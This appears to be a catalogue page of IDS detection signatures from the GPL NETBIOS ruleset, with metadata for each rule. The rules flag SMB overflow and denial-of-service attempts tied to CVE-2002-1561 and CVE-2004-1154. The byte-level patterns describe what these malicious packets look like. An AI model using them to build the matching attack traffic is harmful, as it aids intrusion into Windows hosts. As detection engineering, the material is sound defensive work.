Alert Classtype : protocol-command-decode

URL reference : bugtraq,6005|cve,2002-1561|url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103261

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB IrotIsRunning little endian andx attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.irot; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|02 00|"; within:2; distance:19; byte_jump:4,8,relative,little,align; byte_test:4,>,1024,0,little; reference:bugtraq,6005; reference:cve,2002-1561; reference:url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx; classtype:protocol-command-decode; sid:2103261; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB IrotIsRunning little endian andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,6005|cve,2002-1561|url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103262

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB IrotIsRunning unicode andx attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.irot; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 02|"; within:2; distance:19; byte_jump:4,8,relative,little,align; byte_test:4,>,1024,0,little; reference:bugtraq,6005; reference:cve,2002-1561; reference:url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx; classtype:protocol-command-decode; sid:2103262; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB IrotIsRunning unicode andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,6005|cve,2002-1561|url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103263

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB IrotIsRunning unicode little endian andx attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.irot; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|02 00|"; within:2; distance:19; byte_jump:4,8,relative,little,align; byte_test:4,>,1024,0,little; reference:bugtraq,6005; reference:cve,2002-1561; reference:url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx; classtype:protocol-command-decode; sid:2103263; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB IrotIsRunning unicode little endian andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,6005|cve,2002-1561|url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103022

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NT Trans NT CREATE oversized Security Descriptor attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,!&,128,6,relative; pcre:"/^.{27}/R"; content:"|01 00|"; within:2; distance:37; byte_jump:4,-15,little,relative,from_beginning; isdataat:4,relative; byte_test:4,>,1024,40,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103022; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NT Trans NT CREATE oversized Security Descriptor attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2004-1154

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103019

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE andx oversized Security Descriptor attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"|A0|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|01 00|"; within:2; distance:37; byte_jump:4,-15,little,relative,from_beginning; byte_test:4,>,1024,40,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103019; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NT Trans NT CREATE andx oversized Security Descriptor attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2004-1154

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103034

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE DACL overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"|01 00|"; within:2; distance:64; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:20; byte_jump:4,20,relative,little; byte_test:4,>,32,-16,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103034; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NT Trans NT CREATE DACL overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2004-1154

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103026

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE SACL overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"|01 00|"; within:2; distance:64; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:16; byte_jump:4,16,relative,little; byte_test:4,>,32,-16,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103026; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NT Trans NT CREATE SACL overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2004-1154

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103035

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE andx DACL overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"|A0|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|01 00|"; within:2; distance:37; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:20; byte_jump:4,20,relative,little; byte_test:4,>,32,-16,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103035; rev:9; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NT Trans NT CREATE andx DACL overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2004-1154

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 9

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103027

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE andx SACL overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"|A0|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|01 00|"; within:2; distance:37; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:16; byte_jump:4,16,relative,little; byte_test:4,>,32,-16,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103027; rev:6; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NT Trans NT CREATE andx SACL overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2004-1154

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103051

#alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE andx invalid SACL ace size dos attempt"; flow:stateless; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"|A0|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|01 00|"; within:2; distance:37; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:20; byte_jump:4,20,relative,little; content:"|00 00|"; within:2; distance:-10; classtype:protocol-command-decode; sid:2103051; rev:6; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NT Trans NT CREATE andx invalid SACL ace size dos attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103042

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE invalid SACL ace size dos attempt"; flow:stateless; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"|01 00|"; within:2; distance:64; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:16; byte_jump:4,16,relative,little; content:"|00 00|"; within:2; distance:-10; classtype:protocol-command-decode; sid:2103042; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NT Trans NT CREATE invalid SACL ace size dos attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103050

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE invalid SACL ace size dos attempt"; flow:stateless; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"|01 00|"; within:2; distance:64; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:20; byte_jump:4,20,relative,little; content:"|00 00|"; within:2; distance:-10; classtype:protocol-command-decode; sid:2103050; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NT Trans NT CREATE invalid SACL ace size dos attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103036

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE unicode DACL overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"|01 00|"; within:2; distance:64; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:20; byte_jump:4,20,relative,little; byte_test:4,>,32,-16,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103036; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NT Trans NT CREATE unicode DACL overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2004-1154

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103028

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE unicode SACL overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"|01 00|"; within:2; distance:64; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:16; byte_jump:4,16,relative,little; byte_test:4,>,32,-16,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103028; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NT Trans NT CREATE unicode SACL overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2004-1154

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103037

#alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE unicode andx DACL overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"|A0|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|01 00|"; within:2; distance:37; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:20; byte_jump:4,20,relative,little; byte_test:4,>,32,-16,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103037; rev:6; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NT Trans NT CREATE unicode andx DACL overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2004-1154

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103029

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE unicode andx SACL overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"|A0|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|01 00|"; within:2; distance:37; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:16; byte_jump:4,16,relative,little; byte_test:4,>,32,-16,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103029; rev:6; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NT Trans NT CREATE unicode andx SACL overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2004-1154

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103045

#alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE unicode andx invalid SACL ace size dos attempt"; flow:stateless; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"|A0|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|01 00|"; within:2; distance:37; byte_jump:4,-7,little,relative,from_beginning; isdataat:4,relative; content:!"|00 00 00 00|"; within:4; distance:16; byte_jump:4,16,relative,little; content:"|00 00|"; within:2; distance:-10; classtype:protocol-command-decode; sid:2103045; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NT Trans NT CREATE unicode andx invalid SACL ace size dos attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103053

#alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE unicode andx invalid SACL ace size dos attempt"; flow:stateless; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"|A0|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|01 00|"; within:2; distance:37; byte_jump:4,-7,little,relative,from_beginning; isdataat:4,relative; content:!"|00 00 00 00|"; within:4; distance:20; byte_jump:4,20,relative,little; content:"|00 00|"; within:2; distance:-10; classtype:protocol-command-decode; sid:2103053; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NT Trans NT CREATE unicode andx invalid SACL ace size dos attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103044

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE unicode invalid SACL ace size dos attempt"; flow:stateless; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"|01 00|"; within:2; distance:64; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:16; byte_jump:4,16,relative,little; content:"|00 00|"; within:2; distance:-10; classtype:protocol-command-decode; sid:2103044; rev:6; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NT Trans NT CREATE unicode invalid SACL ace size dos attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103052

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE unicode invalid SACL ace size dos attempt"; flow:stateless; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"|01 00|"; within:2; distance:64; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:20; byte_jump:4,20,relative,little; content:"|00 00|"; within:2; distance:-10; classtype:protocol-command-decode; sid:2103052; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NT Trans NT CREATE unicode invalid SACL ace size dos attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103038

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NT Trans NT CREATE DACL overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"|01 00|"; within:2; distance:64; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:20; byte_jump:4,20,relative,little; byte_test:4,>,32,-16,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103038; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NT Trans NT CREATE DACL overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2004-1154

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103030

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NT Trans NT CREATE SACL overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"|01 00|"; within:2; distance:64; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:16; byte_jump:4,16,relative,little; byte_test:4,>,32,-16,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103030; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NT Trans NT CREATE SACL overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2004-1154

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103039

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NT Trans NT CREATE andx DACL overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"|A0|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|01 00|"; within:2; distance:37; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:20; byte_jump:4,20,relative,little; byte_test:4,>,32,-16,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103039; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NT Trans NT CREATE andx DACL overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2004-1154

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103031

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NT Trans NT CREATE andx SACL overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"|A0|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|01 00|"; within:2; distance:37; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:16; byte_jump:4,16,relative,little; byte_test:4,>,32,-16,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103031; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NT Trans NT CREATE andx SACL overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2004-1154

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103047

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NT Trans NT CREATE andx invalid SACL ace size dos attempt"; flow:stateless; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"|A0|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|01 00|"; within:2; distance:37; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:16; byte_jump:4,16,relative,little; content:"|00 00|"; within:2; distance:-10; classtype:protocol-command-decode; sid:2103047; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NT Trans NT CREATE andx invalid SACL ace size dos attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103055

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NT Trans NT CREATE andx invalid SACL ace size dos attempt"; flow:stateless; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"|A0|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|01 00|"; within:2; distance:37; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:20; byte_jump:4,20,relative,little; content:"|00 00|"; within:2; distance:-10; classtype:protocol-command-decode; sid:2103055; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NT Trans NT CREATE andx invalid SACL ace size dos attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103046

